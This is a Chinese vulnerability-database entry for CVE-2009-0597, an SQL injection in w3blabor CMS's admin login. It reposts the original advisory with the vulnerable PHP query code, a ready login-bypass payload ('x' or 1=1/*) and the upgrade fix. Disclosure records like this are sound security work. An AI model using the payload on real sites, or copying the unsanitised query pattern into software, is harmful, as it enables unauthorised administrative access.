W3B_Cms 'admin/index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117178 漏洞类型 SQL注入
发布时间 2009-01-01 更新时间 2009-02-17
CVE编号 CVE-2009-0597 CNNVD-ID CNNVD-200902-359
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7640
https://cxsecurity.com/issue/WLB-2009020194
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-359
|漏洞详情
w3bcms(又称w3blaborCMS)3.4.0之前的版本的admin/index.php中存在SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助登录操作的benutzername参数(又称用户字段),执行任意SQL指令。
|漏洞EXP
\#'#/
                          (-.-)
   ------------------oOO---(_)---OOo-----------------
   |          __             __                     |
   |    _____/ /_____ ______/ /_  __  ______ ______ |
   |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
   |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
   | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
   | Security Research Division      /____/ 2oo8    |
   --------------------------------------------------
   |   w3blabor CMS <= v3.3.0 Admin Login Bypass    |
   |       (requires magic_quotes_gpc = Off)        |
   --------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.w3blaborcms.de
[!] Detected...: 20.12.2008
[!] Reported...: 20.12.2008
[!] Response...: 21.12.2008

[!] Background.: Sicher! Schnell! Einfach!
                 Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
                 abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
                 angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
                 Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
                 es zu etwas Besonderem!

[!] Bug........: $_POST['benutzername'] & $_POST['passwort'] in admin/index.php near line 93

                  93: if (isset($_GET['action']) && $_GET['action'] == "login" && $_POST['benutzername'] != "" && $_POST['passwort'] != "") {
                  94:
                  95:	$check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."'"));
                  96:
                  97:	if ($check['benutzername'] == "") {
                  98:
                  99:		$_SESSION['login'] = false;
                 100:		header("Location: index.php?fehler=error001");
                 101:		exit;
                 102:
                 103:	} else {
                 104:
                 105:		$md5pw = md5($_POST['passwort']);
                 106:
                 107:		$check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."' AND passwort='".$md5pw."'"));

[!] PoC........: To bypass the admin login:

                 Username: x' or 1=1/*
                 Password: not empty

[!] Solution...: upgrade to version 3.4.0

# milw0rm.com [2009-01-01]
|参考资料

来源:BID
名称:33082
链接:http://www.securityfocus.com/bid/33082
来源:MILW0RM
名称:7640
链接:http://www.milw0rm.com/exploits/7640
来源:SECUNIA
名称:33364
链接:http://secunia.com/advisories/33364
来源:OSVDB
名称:51108
链接:http://osvdb.org/51108
来源:MISC
链接:http://forum.w3bcms.de/viewtopic.php?f=5&t=256